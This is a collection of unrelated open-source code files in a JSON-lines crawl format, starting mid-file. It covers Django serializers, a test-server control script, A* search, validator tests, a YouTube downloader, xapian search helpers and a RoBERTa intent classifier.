CreateMenuItemSerializer(serializers.ModelSerializer):\n class Meta:\n model = MenuItem\n fields = [\n 'name',\n 'description',\n 'price',\n 'section',\n 'diet',\n 'portion'\n ]\n\nclass UpdateMenuItemSerializer(serializers.ModelSerializer):\n class Meta:\n model = MenuItem\n fields = [\n 'name',\n 'description',\n 'price',\n 'section',\n 'diet',\n 'portion',\n 'updated_at'\n ]\n\n name = serializers.CharField(allow_blank=False, default=None)\n description = serializers.CharField(allow_blank=False, default=None)\n price = serializers.DecimalField(max_digits = 6, decimal_places = 2)\n section = serializers.ChoiceField(choices = MenuSections)\n diet = serializers.ChoiceField(choices = DietOptions)\n portion = serializers.IntegerField(min_value = 100, max_value = 1000)\n\n\nclass MenuSerializer(serializers.ModelSerializer):\n items = serializers.SerializerMethodField()\n class Meta:\n model = Menu\n fields = [\n 'id',\n 'name',\n 'description',\n 'items',\n 'created_at',\n 'updated_at'\n ]\n\n def get_items(self, obj):\n items = obj.items.all()\n serializer = MenuItemSerializer(items, many=True)\n return serializer.data\n\nclass CreateMenuSerializer(serializers.ModelSerializer):\n class Meta:\n model = Menu\n fields = ['name', 'description', 'items']\n\nclass UpdateMenuSerializer(serializers.ModelSerializer):\n class Meta:\n model = Menu\n fields = ['name', 'description', 'items', 'updated_at']\n\n name = serializers.CharField(allow_blank=False, default=None)\n description = serializers.CharField(allow_blank=False, default=None)\n items = MenuItemSerializer(many=True)","repo_name":"mihailapuste/chez-michel-django","sub_path":"menu/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26470467098","text":"#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport argparse\nimport fcntl\nimport os\nimport sys\nimport subprocess\nimport traceback\n\nfrom configparser import ConfigParser\nfrom configparser import NoOptionError\nfrom configparser import NoSectionError\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))\n\nfrom bin.ti_command.log import logger as log  # noqa\n\n\nclass TiServerControl(object):\n    \"\"\"\n    Used to start or stop the TiDB auto test framework\n    \"\"\"\n\n    SUBPROCESS_ROOT = \"/\"\n    ACTION_LIST = [\"start\", \"stop\", \"restart\"]\n    TI_SERVER_SECTION = \"TiServer\"\n    # ti server root path\n    TI_ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n    # path of tiDB framework control script\n    TI_CTL_LOCK = os.path.join(TI_ROOT, \"ti_server_ctl_lock\")\n    # path of ti server pid file\n    TI_SERVER_PID = os.path.join(TI_ROOT, \"ti_server_pid\")\n    # root path of tiDB test framework\n    TI_SERVER_ROOT = os.path.join(TI_ROOT, \"ti_server\")\n\n    def __init__(self, server_path, server):\n        self.ti_server_path = os.path.join(server_path, server)\n        self.ti_server_info = {\n            \"host\": \"localhost\",\n            \"port\": \"8020\"\n        }\n\n    @staticmethod\n    def __pre_func():\n        os.umask(0)\n\n    @staticmethod\n    def __exe_cmd(cmd, pid=False):\n        pro = subprocess.Popen(\n            args=cmd, shell=True, stdout=subprocess.PIPE,\n            stderr=subprocess.PIPE, cwd=TiServerControl.SUBPROCESS_ROOT,\n            preexec_fn=TiServerControl.__pre_func, close_fds=True\n        )\n        output = pro.communicate()\n        code = pro.returncode\n        if not pid:\n            return code, output\n        return pro.pid, code, output\n\n    def __start_ti_server(self):\n        log.info(\"begin to start ti-server..\")\n        with open(TiServerControl.TI_CTL_LOCK, \"r+\") as fd:\n            fcntl.flock(fd.fileno(), fcntl.LOCK_EX)\n            is_run = self.is_ti_server_run()\n            if is_run:\n                log.info(\"ti server is run, exist ti_server_control\")\n            else:\n                start_cmd = \"python3 %s\" % self.ti_server_path\n                for arg, value in self.ti_server_info.items():\n                    start_cmd = \"%s -%s %s\" % (start_cmd, arg, value)\n                log.info(\"run ti-server start cmd: %s\" % start_cmd)\n                pro = subprocess.Popen(start_cmd, close_fds=True, shell=True)\n                self.set_ti_server_pid(pro.pid)\n                log.info(\"start ti server successfully for: %s\" %\n                         self.ti_server_path)\n\n    def __stop_ti_server(self):\n        log.info(\"begin to stop ti-server..\")\n        with open(TiServerControl.TI_CTL_LOCK, \"r+\") as fd:\n            fcntl.flock(fd.fileno(), fcntl.LOCK_EX)\n            is_run = self.is_ti_server_run()\n            if not is_run:\n                log.info(\"ti server is not run, exist ti_server_control\")\n            else:\n                ti_server_pid = self.get_ti_server_pid()\n                kill_cmd = \"kill -9 %s\" % ti_server_pid\n                code, output = self.__exe_cmd(kill_cmd)\n                if code:\n                    log.error(\"ti server stop failed, code: %s, output: \"\n                              \"%s\" % (code, output))\n                    raise Exception(output[-1])\n                if os.path.exists(self.TI_SERVER_PID):\n                    os.remove(self.TI_SERVER_PID)\n                log.info(\"ti server stop successfully.\")\n\n    @staticmethod\n    def is_ti_server_run():\n        if not os.path.exists(TiServerControl.TI_SERVER_PID):\n            return False\n        with open(TiServerControl.TI_SERVER_PID, \"r+\") as ti_pid:\n            pid = ti_pid.read()\n        cmdline_path = \"/proc/%s/cmdline\" % pid\n        if not os.path.exists(cmdline_path):\n            return False\n        with open(cmdline_path, \"r+\") as fs_cmdline:\n            cmdline_info = fs_cmdline.read()\n        if not cmdline_info:\n            return False\n        return True\n\n    def get_ti_server_pid(self):\n        if not self.is_ti_server_run():\n            return \"\"\n        with open(TiServerControl.TI_SERVER_PID, \"r+\") as ti_pid:\n            pid = ti_pid.read()\n        return pid\n\n    
def set_ti_server_pid(self, pid):\n        with open(self.TI_SERVER_PID, \"w+\") as fd_pid:\n            fd_pid.write(str(pid))\n        log.info(\"write ti-server pid to pid file: %s. pid: %s\"\n                 % (self.TI_SERVER_PID, pid))\n\n    def operate_ti_server(self, action):\n        if action == \"start\":\n            self.__start_ti_server()\n\n        elif action == \"stop\":\n            self.__stop_ti_server()\n\n        else:\n            self.__stop_ti_server()\n            self.__start_ti_server()\n\n    def __load_config(self, config):\n        if not os.path.exists(config):\n            raise Exception(\"ti server configuration file not exist. \"\n                            \"path: %s\" % config)\n        log.info(\"ti-server config path: %s\" % config)\n        ti_config = ConfigParser()\n        ti_config.read(config)\n        if not ti_config.has_section(self.TI_SERVER_SECTION):\n            log.info(\"there is not ti server configuration in config \"\n                     \"file: %s\" % config)\n            raise NoSectionError(self.TI_SERVER_SECTION)\n        for option in self.ti_server_info:\n            if not ti_config.has_option(self.TI_SERVER_SECTION, option):\n                log.info(\"there is not ti server %s in config \"\n                         \"file: %s\" % (option, config))\n                raise NoOptionError(option, self.TI_SERVER_SECTION)\n            self.ti_server_info[option] = \\\n                ti_config.get(self.TI_SERVER_SECTION, option)\n\n    def run(self):\n        args = init_options()\n        log.info(\"input argument: %s\" % args)\n        if args.config:\n            self.__load_config(args.config)\n        if args.action:\n            action = args.action.lower()\n            if action not in self.ACTION_LIST:\n                log.error(\"action to control ti-server invalid.\")\n                raise Exception(\"Action to control ti-server invalid.\")\n            self.operate_ti_server(action)\n\n    @staticmethod\n    def change_group_own(_path):\n        code, output = TiServerControl.__exe_cmd(\n            \"sudo -n chgrp ${USER} -R %s\" % _path\n        )\n        if code:\n            log.error(\"Change group of %s failed.\" % _path)\n        else:\n            log.info(\"Change group of %s successfully.\" % _path)\n        return code\n\n\ndef init_options():\n    parser = argparse.ArgumentParser()\n    subparsers = \\\n        parser.add_subparsers(metavar=\"<subcommand>\", dest=\"command_name\")\n    command, help_info = \"control\", \"control ti-server\",\n    parser_sub = subparsers.add_parser(command, help=help_info)\n    parser_sub.add_argument(\"-a\", \"--action\", metavar=\"\", required=True,\n                            help=\"Action to control ti-server\")\n    parser_sub.add_argument(\"-c\", \"--config\", metavar=\"\", required=True,\n                            help=\"configuration file of ti-server\")\n    parsed_args = parser.parse_args()\n    return parsed_args\n\n\nif __name__ == \"__main__\":\n    log.init(\"ti_server_control\")\n\n    ti_server = \"ti_server_process.py\"\n    ti_server_root = TiServerControl.TI_SERVER_ROOT\n    log.info(\"ti_server_root: %s, ti_server: %s\" % (ti_server_root, ti_server))\n\n    if not os.path.exists(TiServerControl.TI_CTL_LOCK):\n        with open(TiServerControl.TI_CTL_LOCK, \"w\"):\n            TiServerControl.change_group_own(TiServerControl.TI_CTL_LOCK)\n\n    try:\n        ti_server_ctl = TiServerControl(ti_server_root, ti_server)\n        ti_server_ctl.run()\n    except Exception as e:\n        log.error(\"operate ti-server failed. 
error: %s, trace: %s\" %\n                  (e, traceback.format_exc()))\n","repo_name":"qwasxj/ti_server","sub_path":"bin/ti_server_control.py","file_name":"ti_server_control.py","file_ext":"py","file_size_in_byte":7702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19319989891","text":"from menor_caminho.Map import Map\nimport heapq\nfrom blocos_deslizantes import Puzzle as puzzle_logic\nfrom blocos_deslizantes import GUI as puzzle_gui\nfrom blocos_deslizantes import test_cases as tc\nfrom menor_caminho.GUI import *\n\nmapa = Map('menor_caminho/australia.csv')\n\ndef Zero(*args):\n    return 0\n\nclass Node:\n    def __init__(self, state, g, h):\n        self.state = state\n        self.g = g\n        self.h = h\n        self.f = g + h\n        self.previous = None\n    def __lt__(self, other_node):\n        return self.f < other_node.f\n\n\nclass Search:\n    def __init__(self, initial, next_states, goal, h, g = None):\n        self.type = \"A star\"\n        if not g:\n            g = Zero\n            self.type = \"Greedy\"\n        self.g = g #function g : real cost to reach the state\n        self.h = h #function h : minimum estimated cost\n        self.goal = goal #goal state : the goal state\n        self.initial = initial #initial state : the initial state\n        self.next_states = next_states #function next_states: returns the array of next states\n        self.path = [initial] #array path : vector of the path to be traversed\n        \n\n    def execute(self):\n        # Stores the already visited states\n        closed_states = set()\n        # Dictionary state->node\n        direct = {}\n        # Creates the initial state node and adds it to the heap\n        new_node = Node(state = self.initial,g = 0, h = self.h(self.initial,self.goal))\n        direct[self.initial] = new_node\n        open_node_heap = [new_node]\n        # While the goal state has not been visited\n        while self.goal not in closed_states:\n            # Takes the lowest-value node and its state\n            actual_node = heapq.heappop(open_node_heap)\n            actual_state = actual_node.state\n            # Adds the lowest-value state to the visited states\n            closed_states.add(actual_state)\n            # Analyzes the neighboring states\n            for state in self.next_states(actual_node.state):\n                # Checks whether they have already been visited\n                if state not in closed_states:\n                    # Computes the 'g' and 'h' values of the neighbors\n                    new_g = actual_node.g + self.g(state, actual_state)\n                    new_h = self.h(state, self.goal)\n                    # Checks whether they have already been added to the heap\n                    if direct.get(state) == None:\n                        # If they have not been added\n                        new_node = Node(state = state,g = new_g, h = new_h)\n                        new_node.previous = actual_node\n                        direct[state] = new_node\n                        # Adds to the heap\n                        heapq.heappush(open_node_heap, new_node)\n                    else:\n                        # If they have been added, compares the values\n                        if new_g + new_h < direct[state].f:\n                            # Updates the values\n                            direct[state].g = new_g\n                            direct[state].h = new_h\n                            direct[state].f = new_g + new_h\n                            direct[state].previous = actual_node\n                            # Updates the heap\n                            heapq.heapify(open_node_heap)\n        # Generated path\n        path = []\n        actual_node = direct[self.goal]\n        while actual_node.previous != None:\n            path.append(actual_node.state)\n            actual_node = actual_node.previous\n        path.append(actual_node.state)\n        path.reverse()\n        print(\"Solucao achada({}): {}\".format(self.type, len(path)))\n\n        return path\n\n\n\ndef Menor_caminho_utilizando_Greedy():\n    path = Search(initial=mapa.get_id_city_name(\"Alice Springs\"), next_states=mapa.next, goal= mapa.get_id_city_name(\"Yulara\"), h = mapa.distance).execute()\n    print(\"Custo total:\", mapa.path_cost(path))\n    print(\"Caminho achado:\\n\",mapa.show_path(path))\n    MapDraw(mapa.cidades, path)\n\ndef 
Menor_caminho_utilizando_A():\n    path = Search(initial=mapa.get_id_city_name(\"Alice Springs\"), next_states=mapa.next, goal= mapa.get_id_city_name(\"Yulara\"), h = mapa.distance, g = mapa.cost).execute() \n    print(\"Custo total:\", mapa.path_cost(path))\n    print(\"Caminho achado:\\n\",mapa.show_path(path))\n    MapDraw(mapa.cidades, path)\n\nif __name__ == \"__main__\":\n    # ------ begin shortest path ---------------------\n    # 1) Shortest path using Greedy:\n    # Menor_caminho_utilizando_Greedy()\n    # 2) Shortest path using A*:\n    # Menor_caminho_utilizando_A()\n    # ------ end shortest path -----------------------\n    # ------ begin sliding blocks --------------------\n    node = puzzle_logic.Node() # pass the board size in the constructor. The default is 9\n    goal_state = node.get_state()\n    #### Choose the case to run: uncomment only one of the three lines below####\n    # node.shuffle() # pass a tuple in the constructor indicating the minimum and maximum number of moves. The default is (30, 50)\n    # node.load_state(tc.test_case[\"easy\"])\n    # node.load_state(tc.test_case[\"not_so_easy\"])\n    initial_state = node.get_state()\n    (g,h,next_states) = node.get_evaluation_functions()\n    # 1) Sliding blocks using Greedy:\n    # solution = Search(initial=initial_state, next_states=next_states, goal=goal_state, h=h).execute() \n    # puzzle_gui.Game(solution)\n    # 2) Sliding blocks using A*:\n    # solution = Search(initial=initial_state, next_states=next_states, goal=goal_state, h=h, g=g).execute() \n    # puzzle_gui.Game(solution)\n    # ------ end sliding blocks ----------------------\n\n    pass\n","repo_name":"EricToshio/CTC-17","sub_path":"projeto-1/busca_informada.py","file_name":"busca_informada.py","file_ext":"py","file_size_in_byte":5734,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3937975246","text":"import logging\nfrom logging.handlers import RotatingFileHandler\nimport os\n\ndef set_up_logging(app):\n    log_file_path = os.path.abspath(app.config['log_file'])\n    if not os.path.exists(log_file_path):\n        os.makedirs(os.path.dirname(log_file_path), exist_ok=True)\n    handler = RotatingFileHandler(app.config['log_file'], maxBytes=10000, backupCount=1)\n    handler.setLevel(logging.INFO)\n    app.logger.addHandler(handler)","repo_name":"shankha117/peace","sub_path":"app/utils/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21472065125","text":"from qsm import lib\nfrom unittest.mock import patch\nimport re\nimport hypothesis\nimport faker\nimport pytest\nimport hypothesis.strategies as s\nfrom faker import providers\n\n\ndef test_run_exists():\n    assert lib.run is not None\n\n# >>> RUN >>>\n# ~~~ DOM0 ~~~\n\n\ndef test_dom0_command_is_executed():\n    with patch(\"qsm.lib.check_call\", return_value=0, autospec=True) as mock_check_call:\n        lib.run(\"ls -l\", \"dom0\", \"user\")\n        _arg = mock_check_call.call_args[0][0]\n        assert re.search(\n            r\"ls -l\", _arg), \"command was not executed in dom0\"\n\n\ndef test_dom0_command_is_executed_as_user():\n    with patch(\"qsm.lib.check_call\", return_value=0, autospec=True) as mock_check_call:\n        lib.run(\"ls -l\", \"dom0\", \"user\")\n        _arg = mock_check_call.call_args[0][0]\n        assert re.search(r\"sudo --user=user\",\n                         _arg), \"dom0 command was not executed as user\"\n\n\ndef test_dom0_command_is_executed_as_root():\n    with patch(\"qsm.lib.check_call\", return_value=0, autospec=True) as 
mock_check_call:\n lib.run(\"ls -l\", \"dom0\", \"root\")\n _arg = mock_check_call.call_args[0][0]\n assert re.search(r\"sudo --user=root\",\n _arg), \"dom0 command was not executed as root\"\n\n# ~~~ DOMU ~~~\n\n\ndef test_domU_command_is_executed():\n with patch(\"qsm.lib.check_call\", return_value=0, autospec=True) as mock_check_call:\n lib.run(\"ls -l\", \"domU\", \"user\")\n _arg = mock_check_call.call_args[0][0]\n assert re.search(r\"^qvm-run[\\w\\W]+domU\",\n _arg), \"command was not executed in domU\"\n\n\ndef test_domU_command_is_executed_as_user():\n with patch(\"qsm.lib.check_call\", return_value=0, autospec=True) as mock_check_call:\n lib.run(\"ls -l\", \"domU\", \"user\")\n _arg = mock_check_call.call_args[0][0]\n assert re.search(r\"^qvm-run[\\w\\W]+--user user\",\n _arg), \"domU command not executed as user\"\n\n\ndef test_domU_command_is_executed_as_root():\n with patch(\"qsm.lib.check_call\", return_value=0, autospec=True) as mock_check_call:\n lib.run(\"ls -l\", \"domU\", \"root\")\n _arg = mock_check_call.call_args[0][0]\n assert re.search(r\"^qvm-run[\\w\\W]+--user root\",\n _arg), \"domU command not executed as root\"\n\n\n# >>> PREDICATES >>>\n# ~~~ is_ip() ~~~\ndef test__is_ip__happy_path():\n \"\"\"Test that any valid ipv4/v6 address will return True for network addresses when network=True\"\"\"\n fake = faker.Faker()\n fake.add_provider(providers.internet)\n test_cases = [\n fake.ipv4(network=False),\n fake.ipv4(network=True),\n fake.ipv6(network=False),\n fake.ipv6(network=True),\n ]\n\n for ip in test_cases:\n assert lib.is_ip(ip, network=True), \\\n \"should return True for {}\".format(ip)\n\n\ndef test__is_ip__network_true__happy_path():\n \"\"\"Test that any valid ipv4/v6 address will return True for non-network addresses when network=False\"\"\"\n fake = faker.Faker()\n fake.add_provider(providers.internet)\n test_cases = [\n fake.ipv4(network=False),\n fake.ipv6(network=False),\n ]\n\n for ip in test_cases:\n assert lib.is_ip(ip, network=False), \\\n \"should return True for {}\".format(ip)\n\n\ndef test__is_ip__not_net__negative():\n \"\"\"Test that a network ip will cause False to be returned, when network=False\"\"\"\n fake = faker.Faker()\n fake.add_provider(providers.internet)\n test_cases = [\n fake.ipv4(network=True),\n fake.ipv6(network=True),\n ]\n\n for ip in test_cases:\n assert not lib.is_ip(ip, network=False), \\\n \"should return False for {}\".format(ip)\n\n\n@hypothesis.given(s.one_of(s.text(), s.booleans(), s.integers(), s.floats(), s.lists(s.integers())))\ndef test__is_ip__invalid_type__negative_fuzz(value):\n \"\"\"Tests random types. 
IP addresses must be strings.\"\"\"\n assert not lib.is_ip(value), \\\n \"should return False for {}\".format(value)\n\n\n@pytest.mark.parametrize(\"value\", [\n \"1\",\n \"1,2\",\n \"1-2\",\n \"1-2,3\",\n \"4,1-2,3\",\n \"65535\",\n \"65534-65535\",\n \"2000,65534-65535\",\n])\ndef test__assert_valid_dstports__happy_path(value):\n assert lib.assert_valid_dstports(value), \\\n \"{} should return True\".format(value)\n\n\n@pytest.mark.parametrize(\"value\", [\n \"1 \",\n \"1+2\",\n \"65536\",\n \"100000\",\n \"0\",\n \"-\",\n \"-0\",\n \"1-0\",\n \"1--1\",\n \"-1\",\n])\ndef test__assert_valid_dstports__negative(value):\n with pytest.raises(AssertionError):\n lib.assert_valid_dstports(value)\n\n\n_valid_ports_strat = s.integers(min_value=1, max_value=65535)\n@hypothesis.given(_valid_ports_strat, _valid_ports_strat, _valid_ports_strat)\ndef test__assert_valid_dstports__happy_fuzz(one, two, three):\n \"\"\"Test a range of valid ports, in various configurations\"\"\"\n cases = [\n str(one),\n \"{},{}\".format(one, two),\n \"{},{}-{}\".format(one, two, three),\n \"{0},{1}-{2},{0}\".format(one, two, three),\n \"{0},{1}-{2},{0}-{2},{0}\".format(one, two, three)\n ]\n\n for case in cases:\n assert lib.assert_valid_dstports(str(case)), \\\n \"{} should return True\".format(case)\n\n\n_invalid_ports_strat_1 = s.integers(min_value=65536, max_value=100000)\n_invalid_ports_strat_2 = s.integers(min_value=-100000, max_value=0)\n@hypothesis.given(_invalid_ports_strat_1, _invalid_ports_strat_2, _invalid_ports_strat_1)\ndef test__assert_valid_dstports__negative_fuzz(one, two, three):\n \"\"\"Test a range of valid ports, in various configurations\"\"\"\n cases = [\n str(one),\n \"{},{}\".format(one, two),\n \"{},{}-{}\".format(one, two, three),\n \"{0},{1}-{2},{0}\".format(one, two, three),\n \"{0},{1}-{2},{0}-{2},{0}\".format(one, two, three)\n ]\n\n for case in cases:\n with pytest.raises(AssertionError):\n lib.assert_valid_dstports(str(case))\n\n\n@hypothesis.given(s.text())\ndef test__is_ip__fuzz_random_string(random_string):\n assert not lib.is_ip(random_string), \\\n \"should return False for {}\".format(random_string)\n\n\n# ~~~ is_meaningful_string() ~~~\n\ndef test_is_meaningful_string_rejects_empty_string():\n assert not lib.is_meaningful_string(\n \"\"), \"an empty string should be rejected\"\n\n\ndef test_is_meaningful_string_happy_path_fuzz():\n assert lib.is_meaningful_string(\"text\"), \"should be accepted\"\n\n\n# ~~~ is_mac() ~~~\n\ndef test_is_mac_accepts_mac():\n assert lib.is_mac(\"00:01:36:12:e6:ff\"), \"should accept a mac address\"\n\n\n@hypothesis.given(s.text())\ndef test_is_mac_rejects_non_mac(text):\n assert not lib.is_mac(text), \"should reject non-macs\"\n","repo_name":"0b10/qsm","sub_path":"src/qsm/tests/test_lib.py","file_name":"test_lib.py","file_ext":"py","file_size_in_byte":6606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36526486030","text":"from pytube import YouTube\n\n\nOUTPUT_PATH = \"../../downloaded-videos\"\nFILENAME_PREFIX = \"my_video_\"\n\n\nclass Video:\n def __init__(self, link: str):\n self.youtube_video = YouTube(link)\n\n self.link = link\n self.title = self.youtube_video.title\n self.views = self.youtube_video.views\n self.length = self.youtube_video.length\n self.author = self.youtube_video.author\n\n def download_video(self, output_path: str = OUTPUT_PATH, filename_prefix: str = FILENAME_PREFIX):\n self.youtube_video.streams.get_highest_resolution().download(\n output_path=output_path,\n 
filename_prefix=filename_prefix\n )\n print(f\"{self.title} download done. Saved in {output_path}\")\n\n def download_audio(self, output_path: str = OUTPUT_PATH, filename_prefix: str = FILENAME_PREFIX):\n self.youtube_video.streams.get_audio_only().download(\n output_path=output_path,\n filename_prefix=filename_prefix\n )\n print(f\"Audio from {self.title} downloaded. Saved in {output_path}\")\n","repo_name":"Ptrick97/video-downloader","sub_path":"src/video-downloader/models/video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34490279768","text":"import xapian\nimport re\nfrom spotlyt.snowball import stopwords\nfrom spotlyt.constants import *\n\n_split_re = re.compile(r'<\\w+[^>]*>|</\\w+>|[\\w\\']+|\\s+|[^\\w\\'\\s<>/]+')\n_range_re = re.compile(\"(?P<start>[0-9]+)\\.\\.(?P<end>[0-9]+)?(:(?P<mode>asc|desc))?\")\n\nasync def query_parser(database, language):\n qp = xapian.QueryParser()\n qp.set_stemmer(xapian.Stem(language))\n qp.set_stemming_strategy(xapian.QueryParser.STEM_SOME)\n qp.set_database(database)\n\n return qp\n\n\nasync def do_spellcheck(queryparser, querystring): \n queryparser.parse_query(querystring, xapian.QueryParser.FLAG_SPELLING_CORRECTION)\n return queryparser.get_corrected_query_string().decode(\"utf8\")\n\n\nasync def do_stopwords(querystring, language):\n global stopwords\n _stopwords = stopwords.get(language)\n querylist = await split(querystring)\n querystring = \"\".join([x if x not in _stopwords else \"-\"+x for x in querylist])\n\n return querystring\n\nasync def split(text):\n return _split_re.findall(text)\n\nasync def do_flags(spell_check=False, synonyms=False):\n flag = (xapian.QueryParser.FLAG_PARTIAL \n | xapian.QueryParser.FLAG_LOVEHATE\n | xapian.QueryParser.FLAG_PHRASE\n | xapian.QueryParser.FLAG_WILDCARD)\n\n if spell_check:\n flag |= xapian.QueryParser.FLAG_SPELLING_CORRECTION\n \n if synonyms:\n flag |= (xapian.QueryParser.FLAG_AUTO_SYNONYMS | \n xapian.QueryParser.FLAG_AUTO_MULTIWORD_SYNONYMS |\n xapian.QueryParser.FLAG_SYNONYM)\n\n return flag \n \nasync def join_query(op, *querylist):\n _query = None\n for i, query in enumerate(querylist):\n if i == 0: \n _query = query\n else:\n if query:\n _query = xapian.Query(op, _query, query)\n \n return _query\n\nasync def query_fields(querystring, queryparser, fields):\n queries = []\n for _, field in fields:\n field_prefix = TERM_PREFIXES[\"field\"] + field.upper()\n field_query = queryparser.parse_query(querystring, 1, field_prefix)\n\n queries.append(field_query)\n \n return await join_query(xapian.Query.OP_OR, *queries)\n\nasync def query_facets(querystring, queryparser, facets):\n queries = []\n slots = []\n for field_slot, field_name, facet in facets:\n slots.append(field_slot)\n field_prefix = TERM_PREFIXES[\"field\"] + field_name.upper()\n\n if isinstance(facet, str):\n queries.append(\n xapian.Query('{}:{}'.format(field_prefix, facet))\n )\n elif isinstance(facet, list):\n for f in facet:\n if isinstance(f, str):\n queries.append(\n xapian.Query('{}:{}'.format(field_prefix, f))\n )\n \n return slots, await join_query(xapian.Query.OP_AND, *queries)\n\nasync def query_ranges(queryparser, ranges):\n \n queries = []\n\n keymaker = xapian.MultiValueKeyMaker()\n\n for field_slot, _, value in ranges:\n if not isinstance(value, str):\n raise ValueError(\"Range value must be a string\")\n\n match = _range_re.fullmatch(value)\n\n start, end, mode = match.group(\"start\", 
\"end\", \"mode\")\n range_str = f\"{start}..{ end if end else '' }\"\n\n queryparser.add_valuerangeprocessor(\n xapian.NumberValueRangeProcessor(field_slot)\n )\n\n range_query = queryparser.parse_query(range_str)\n queries.append(range_query)\n\n if mode:\n if mode == \"asc\":\n keymaker.add_value(field_slot, False)\n elif mode == \"desc\":\n keymaker.add_value(field_slot, True)\n \n return await join_query(xapian.Query.OP_AND, *queries), keymaker\n \n\n","repo_name":"keosariel/spotlyt-beta","sub_path":"spotlyt/searcher.py","file_name":"searcher.py","file_ext":"py","file_size_in_byte":3737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"15480434380","text":"# kakao_zip string trim\n\ndef solution(msg):\n dic,answer = list('0ABCDEFGHIJKLMNOPQRSTUVWXYZ'),[]\n \n while msg:\n out = False\n for i in range(len(msg)-1,-1,-1):\n for j in range(len(dic)-1,-1,-1):\n if dic[j] == msg[:i+1]:\n dic.append(msg[:i+2])\n msg = msg[i+1:]\n answer.append(j)\n out = True\n break\n if out : break\n \n return answer\n \nif __name__ == \"__main__\":\n msg = 'ABABABABABABABAB' \n print(solution(msg))\n","repo_name":"light-src/AlgoForTest","sub_path":"Programmers/190829 [3차] 압축/tyl.py","file_name":"tyl.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"39540814038","text":"import io\nimport unittest\nfrom unittest import mock\n\nfrom src.day_05 import countOverlappingPoints\n\nEXAMPLE_INPUT = \"\"\"0,9 -> 5,9\n8,0 -> 0,8\n9,4 -> 3,4\n2,2 -> 2,1\n7,0 -> 7,4\n6,4 -> 2,0\n0,9 -> 2,9\n3,4 -> 1,4\n0,0 -> 8,8\n5,5 -> 8,2\"\"\"\n\nclass TestDay05(unittest.TestCase):\n\n def test_first_example(self):\n fake_file = io.StringIO(EXAMPLE_INPUT)\n with mock.patch('src.day_05.open', return_value=fake_file, create=True):\n self.assertEqual(5, countOverlappingPoints(\"test.txt\", False))\n\n def test_second_example(self):\n fake_file = io.StringIO(EXAMPLE_INPUT)\n with mock.patch('src.day_05.open', return_value=fake_file, create=True):\n self.assertEqual(12, countOverlappingPoints(\"test.txt\", True))\n","repo_name":"matthew-griffin/advent-code-2021","sub_path":"tests/test_day_05.py","file_name":"test_day_05.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36066539156","text":"from transformers.modeling_outputs import SequenceClassifierOutput\nfrom transformers.models.roberta.modeling_roberta import RobertaConfig, RobertaForSequenceClassification\nimport torch.nn as nn\nimport torch\n\nimport pytorch_lightning as pl\n\nfrom util.others.my_metrics import Accuracy\nfrom util.others.dist_utils import is_main_process\n\nfrom transformers import (\n get_cosine_schedule_with_warmup\n)\n\nclass Intent_CLS_Module(pl.LightningModule):\n def __init__(self, _config, num_labels=2):\n super().__init__()\n self.save_hyperparameters()\n \n if _config['model_name'] == 'roberta-base':\n model_config = RobertaConfig.from_pretrained(pretrained_model_name_or_path=\"roberta-base\",\n hidden_dropout_prob=0.1, num_labels=num_labels)\n self.model = RobertaForSequenceClassification.from_pretrained(\"roberta-base\", config=model_config)\n \n self.metric = Accuracy()\n\n def forward(self, input_ids, attention_mask, labels=None):\n \n outputs = self.model.roberta(input_ids=input_ids, attention_mask=attention_mask)\n sequence_output = outputs[0]\n logits = 
self.model.classifier(sequence_output)\n \n loss_fct = nn.CrossEntropyLoss()\n loss = loss_fct(logits, labels)\n \n return SequenceClassifierOutput(\n loss=loss,\n logits=logits,\n hidden_states=outputs.hidden_states,\n attentions=outputs.attentions,\n )\n \n def training_step(self, batch, batch_idx):\n output = self(**batch)\n \n self.log(f\"train/loss\", output.loss)\n return output.loss\n \n def validation_step(self, batch, batch_idx):\n output = self(**batch)\n self.metric.update(output.logits, batch['labels'])\n \n self.log(f\"val/loss\", output.loss)\n\n def validation_epoch_end(self, outs):\n accuracy = self.metric.compute().tolist()\n # if is_main_process():\n # print(f'accuracy: {str(accuracy)}')\n self.metric.reset()\n \n self.log(f\"val/accuracy\", accuracy)\n \n def test_step(self, batch, batch_idx):\n output = self(**batch)\n self.metric.update(output.logits, batch['labels'])\n \n def configure_optimizers(self):\n param_optimizer = self.named_parameters()\n no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']\n optimizer_grouped_parameters = [{\n 'params': [\n p for n, p in param_optimizer\n if not any(nd in n for nd in no_decay)\n ],\n 'weight_decay':\n 0.01\n }, {\n 'params':\n [p for n, p in param_optimizer if any(nd in n for nd in no_decay)],\n 'weight_decay':\n 0.0\n }]\n optimizer = torch.optim.AdamW(optimizer_grouped_parameters, lr=0.00005, betas=(0.9, 0.999))\n scheduler = get_cosine_schedule_with_warmup(\n optimizer, num_warmup_steps=self.hparams._config['warmup_steps'], num_training_steps=self.hparams._config['max_steps']\n )\n\n sched = {\"scheduler\": scheduler, \"interval\": \"step\"}\n\n return (\n [optimizer],\n [sched],\n 